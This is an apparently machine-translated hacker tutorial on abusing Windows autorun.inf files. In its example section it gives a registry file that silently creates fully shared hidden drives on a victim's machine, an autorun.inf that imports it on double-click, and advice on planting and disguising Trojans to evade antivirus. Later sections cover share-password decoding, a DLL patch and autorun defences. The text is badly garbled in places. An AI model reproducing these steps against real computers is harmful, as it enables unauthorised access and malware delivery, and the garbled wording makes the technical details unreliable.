Principle of virus self-running self-replication

Recently, autorun. inf files are widely used to completely share all the hard disks of the other party or use Trojans. Because autorun. inf files are rarely used in hacker technology,
There are not many related materials, and many people think this is mysterious. This article attempts to solve this problem for you, so that you can fully understand this complicated but extremely interesting technology.

I. Theoretical Basis

Friends who often use CDs know that many CDs run automatically when they are put into the optical drive. How do they do this? When the disc is attached to the optical drive, it will be automatically executed, mainly relying on two files.
The autorun. inf file, the other is one of the system files of the operating system itself. Cdsealing. VxD will detect whether there is any action in the optical drive at any time. If
Find the autorun. inf file under the root directory of the CD. If the autorun. inf file exists, execute the preset program in it.

Autorun. INF not only allows the CD to run programs automatically, but also allows the hard disk to run programs automatically. The method is very simple. Open notepad, right-click the file, and select "RENAME" in the pop-up menu ", rename it Autorun. INF, in autorun. type the following content in INF:

[Autorun] // indicates that the autorun part starts and must be entered
Icon = C:/C. ICO // a personalized drive letter icon for drive C. ICO
Open = C:/1.exe // specifies the region and name of the program. Here, 1.exe is under the C drive.

Hosts file!

The "[Autorun]" line must be in a fixed format. The "icon" line corresponds to the icon file, "C:/C. ICO is the icon file path and file name. You can
To change it to the path and file name of your image file. In addition, ". ICO" is the extension of the icon file. If you do not have this type of file on hand, you can use ACDSee to convert the other formats
To the ICO format, or find a file with the suffix BMP and rename it to the ICO file.

The "open" line specifies the file to be automatically run and its drive letter and path. Note that if the hard disk and directory you want to change do not have an automatic playback file, you should delete the "open" line. No
The hard disk cannot be opened because the automatic playback file cannot be found. You can only right-click the drive letter and select "open" in the pop-up menu.

Note: The saved file name must be "autorun. inf". The prepared autorun. inf file and icon file must be placed in the root directory of the hard disk. Further, if
If the content of a hard disk is relatively fixed for the time being, you may wish to use flash to make an automatic playback file and compile the "autorun" file. Then you will have the coolest and most personalized hard disk.

It's not over yet. As you know, after some CDs are placed, right-click the icon and a special directory menu will be generated. If you can right-click our hard drive
This effect will be more distinctive. In fact, the CD can achieve this simply because there are two statements in the autorun. inf file:

Shell/flag = right-click the content in the displayed menu

Shell/flag/command = file to be executed or command line

Therefore, add the preceding statement to the autorun. inf file to the directory menu with special features of the hard disk, for example:

Shell/1 = days old
Shell/1/command/= notepad OK .txt
Article
. Note: The "Upload example" file is in the root directory of the hard disk. notepad is the built-in Notepad program. If the file to be executed is a direct executable program
"Command/" and then add the executable program file name directly.

Ii. Instances

The following is an example: if you scan to a machine with 139 shared, and the other machine only shares the D disk, we want to share all the drives of the other machine. First, edit a registry file, open notepad, and type the following content:

Regedit4
'A row must be empty.
[HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/Network/LANMAN/C $]
"Path" = "C ://"
"Remark" = ""
"Type" = DWORD: 00000000
"Flags" = DWORD: 00000302
"Parmlenc" = HEX:
"Parm2enc" = HEX:

[HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/Network/LANMAN/d $]
"Path" = "D ://"
"Remark" = ""
"Type" = DWORD: 00000000
"Flags" = DWORD: 00000302
"Parmlenc" = HEX:
"Parm2enc" = HEX:

[HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion/Network/LANMAN/C $]
"Path" = "E ://"
"Remark" = ""
"Type" = DWORD: 00000000
"Flags" = DWORD: 00000302
"Parmlenc" = HEX:
"Parm2enc" = HEX:

I only set the above to the E drive. If the other side has many logical drive letters, set them on your own. Save the preceding part as the share. reg file for backup. Note that regedit4 is written in upper case and top case. Leave the last row empty and press the Enter key once in the last row.

Open notepad, compile an autorun. inf file, and enter the following content:

[Autorun]
Open = Regedit/s share. Reg // Add the/S parameter to ensure that no information is displayed during import.

Save the autorun. inf file. Add share. reg and autorun. INF these two files are copied to the root directory of the d disk of the other party, so that the other party only needs to double-click the D disk to share. reg import the registry, so that all the drives will be fully shared after the other computer restarts.

If you want to have a Trojan horse in the Peer, change "open = share. Reg" to "open = Trojan Server File Name" in the autorun. inf file, and then
Autorun. inf is copied to the root directory of the d disk of the other Party together with the configured Trojan server, so that the other party does not need to run the Trojan server program, but simply double-click the D disk to run the Trojan! This is done
The obvious benefit is that it greatly increases the initiative of Trojan running! Note: Many people are very vigilant now. unfamiliar files won't run easily, and this method is hard to prevent.

It should be noted that the people who give you a trojan won't be so stupid not to disguise the Trojan. Generally, they will change the name of the Trojan server file, or nice or very similar to the system file name, and then change the Trojan
Icon to make it look like a TXT file, ZIP file, or image file. Finally, modify the trojan resource file so that it is not recognized by anti-virus software. When the server user believes it is true, trojans intrude into the system.
System. In fact, it is not difficult to understand it from another angle ?? If you give Trojans to others, I think you will do the same. The above methods are supplemented by the autorun. inf file in the above content!

Iii. Defense methods

The shared category is completely determined by the flags flag, and its key value determines the type of the shared directory. When flags = 0x302, restart the system and the Directory sharing mark disappears.
Share. In fact, the directory is fully shared. The popular Internet shared worms use this feature. Change "Flags" = DWORD: 00000302
To "Flags" = DWORD: 00000402, you can see that the hard disk is shared, understand? The secret is here!

In the preceding code, the parmlenc and parm2enc attributes are encrypted passwords. The system uses the 8-bit passwords and the "35 9A 4B A6 53 A9"
D4
6a "to perform the exclusive or operation. To obtain the password, perform the exclusive or operation again, and then query the ASCII table to obtain the directory password. One software in the network software uses this property to crack the network password.
The Shared Password of another computer is displayed on one machine in the local network.

The nethacker ⅱ software designed by TCP/IP protocol can pass through the Internet network, find the shared host, and then perform corresponding operations. Therefore, when you use modem to access the Internet, be careful because your host will be fully shared with the other party.

The solution is to set HKEY_LOCAL_MACHINE/software/Microsoft/Windows/CurrentVersion
Delete "C $", "d $", and "e $" under/Network/LANMAN. Delete vserver. VxD under Windows/system,
It is a virtual device driver shared between files and printers on Microsoft networks, and then HKEY_LOCAL_MACHINE/System
Delete the vserver key value under/CurrentControlSet/services/VxD/to ensure security.

In addition, disabling the hard disk Autorun function is also an effective way to prevent hacker intrusion. The specific method is to enter Regedit in "run" in the "Start" menu, open the Registry Editor, and expand
Open HKEY_CURRENT_USER/software/Microsoft/Windows/CurrentVersion/policies
Under the/exploer primary key, find "NoDriveTypeAutoRun" in the right pane, which determines whether to execute the CDROM or hard disk Autorun function.

Double-click NoDriveTypeAutoRun. By default, the autorun function is disabled.
The default "NoDriveTypeAutoRun" key value is, 00, (figure 2 ). The first value "95" is a hexadecimal value, which indicates that all disabled
The sum of the running devices. Converting "95" to binary is 10010101. Each of them represents a device. Different devices in windows are represented by the following values:

The device name. The device name must contain the following values:
Dkive_unknown 0 1 01 H unrecognizable device type
Drive_no_root_dir 1 0 02 h drive without the root directory (drive without root directory)
Drive_removable 2 1 04 H removable drive (removable drive)
Drive_fixed 3 0 08 h fixed drive (fixed drive)
Drive_remote 4 1 10 h network drive)
Drive_cdrom 5 0 20 h optical drive (CD-ROM)
Drive_ramdisk 6 0 40 h RAM disk (RAM disk)
Keep drive types not specified for 7 1 80 h (not yet specified drive disk)

The value 0 in the table listed above indicates that the device is running, and the value 1 indicates that the device is not running (by default, windows prohibits automatic operation of devices 80 h, 10 h, 4 h, and 01h
Rows, these values are accumulated exactly 95 h in hexadecimal format, so NoDriveTypeAutoRun "Default key value is, 00 ).
The above analysis shows that by default, the devices that will automatically run are drive_no_root_dir, drive_fixed, drive_cdrom,
Drive_ramdisk is the four Reserved devices. to disable the automatic running of the autorun. inf file on the hard disk, set the value of drive_fixed to 1, because
Drive_fixed represents a fixed drive, that is, a hard disk. In this way, the original 10010101 (from bottom to top in the "value" column of the table) is changed to 10011101 of the binary,
Convert to hexadecimal format 9D. Now, change the "NoDriveTypeAutoRun" key value to 9d, 00, and then close the registry editor. After the computer is restarted, the hard disk will be closed.
Autorun function.

If you understand, you must know how to disable the optical disc Autorun function! Set drive_cdrom to 1.
The first value in the "NoDriveTypeAutoRun" key value is 10110101, that is, the hexadecimal B5. Change the first value to B5 and close the registry editor.
After the computer is started, the autorun function of CDROM is disabled. If you only want to disable the autorun function of the software disc, but keep the automatic playback capability of the CD audio disc, you only need
The key value of "NoDriveTypeAutoRun" is changed to BD, and 00.

If you want to restore the autorun function of the hard drive or optical drive, perform a reverse operation.

In fact, the autorun. inf file is not required to run the program in the root directory of most hard disks, so we can disable the autorun function of the hard disk, even in the root directory of the hard disk
The autorun. inf file is recorded, and Windows does not run the specified program, which can prevent hackers from using the autorun. inf file.

In addition, we should also enable Windows to display hidden shares. We all know that in Windows
When sharing is set in 9x, you can hide the sharing by adding the "$" symbol after the sharing name. For example, if you want to share a C drive of a computer named share, you only need to set the share name
C $. In this way, we will not be able to see the shared drive C. We can only access the shared drive by entering the exact path of the shared drive. However, we only need to slightly modify the msnp32.dll file on the computer. You can
To display hidden shares in windows.

Because msnp32.dll is called in windows and cannot be modified directly, we need to copy msnp32.dll to drive C and change it
Msnp32 and msnp32.dll are in the C:/Windows/system folder. Run the ultraedit and other hexadecimal file editors to open msnp32 and find
"24 56 E8
17 "(located at the offset address 00003190 ~ 000031a0), find it, change "24" to "00", save it, and disable ultraedit. Restart the computer to enter DoS
Mode. Enter copy C:/msnp32.dll at the command prompt.
C:/Windows/system/msnp32.dll. restart Windows and click share to view the hidden share.

Finally, we would like to remind you that the hacker software, such as nethacker ⅱ, designed using the TCP/IP protocol, can pass through the Internet, find the shared host, and then perform relevant operations. So when
You must be careful when using modem to access the Internet. If you are not careful, your host will be fully shared with the other party. The only way to prevent such incidents is to constantly check the system, patch the system, and use it frequently.
Anti-virus software, open _ blank "> firewall when accessing the internet, pay attention to exceptions, pay attention to the content of the autorun. inf file, disable sharing or do not set to full sharing, and add
A Shared Password.
Prevention Method:

The current USB flash drive viruses are all entered through autorun. inf;
Autorun. inf is a normal file, but can be exploited for other malicious operations;
Different people may use autorun. inf to place different viruses. Therefore, they cannot simply say what viruses are. They can be all viruses, Trojans, hacker programs, etc;
Generally, the USB flash drive should not contain the autorun. inf file ;*
If you find that the USB flash drive has autorun. inf and is not generated by yourself, delete it and check the virus as soon as possible;
If you have files like recycle bin and rising star files, you can compare the recycle bin name on the hard disk with the genuine rising star name, and confirm that the content is not generated by you, delete it;
At the same time, it is recommended that you do not double-click the USB flash drive when inserting a USB flash drive. Another better technique is to press the Shift key before inserting the USB flash drive, and then insert the USB flash drive. It is recommended that you press the USB flash drive for a longer time. After insertion, right-click the USB flash drive and select "Resource Manager" to open the USB flash drive.
Note:
*: Some USB flash drive manufacturers may also use autorun. inf for their own special designs to allow users to execute the special programs of the vendor. It has been confirmed that some vendors use this method. Therefore, it is recommended that you first identify the purchased USB flash drive or consult the sales staff.